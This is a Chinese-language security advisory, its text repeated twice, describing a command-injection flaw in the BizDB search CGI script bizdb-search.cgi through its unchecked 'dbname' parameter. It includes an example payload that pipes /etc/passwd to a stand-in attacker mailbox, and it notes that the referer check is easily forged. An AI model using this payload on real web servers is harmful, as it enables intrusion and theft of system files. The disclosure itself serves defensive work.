BizDB是Cnctek开发的数据库以及搜索引擎软件。 BizDB安装程序中包含一个CGI脚本:bizdb-search.cgi,它被用来搜索bizdb数据库。攻击者可以通过修改CGI参数使bizdb-search.cgi在Web服务器上执行shell命令。 bizdb-search.cgi使用\"open\"命令来打开数据库文件,该文件名是由\"dbname\"变量接收 用户输入的。它并没有对输入数据进行检查。攻击者可以用带有管道符的shell命令替换掉 正常的数据库文件名:\"bizdb\",例如: \";cat\\%20/etc/passwd|mail\\%20attacker@evil.site|\" 这样,/etc/passwd文件的内容就会被发送到攻击者的邮箱中去。这个脚本会检查是否 HTTP_REFERER变量是否被正确设置,但是这个变量是很容易被伪造的,因此并不能真正 阻止攻击的发生。
BizDB是Cnctek开发的数据库以及搜索引擎软件。 BizDB安装程序中包含一个CGI脚本:bizdb-search.cgi,它被用来搜索bizdb数据库。攻击者可以通过修改CGI参数使bizdb-search.cgi在Web服务器上执行shell命令。 bizdb-search.cgi使用\"open\"命令来打开数据库文件,该文件名是由\"dbname\"变量接收 用户输入的。它并没有对输入数据进行检查。攻击者可以用带有管道符的shell命令替换掉 正常的数据库文件名:\"bizdb\",例如: \";cat\\%20/etc/passwd|mail\\%20attacker@evil.site|\" 这样,/etc/passwd文件的内容就会被发送到攻击者的邮箱中去。这个脚本会检查是否 HTTP_REFERER变量是否被正确设置,但是这个变量是很容易被伪造的,因此并不能真正 阻止攻击的发生。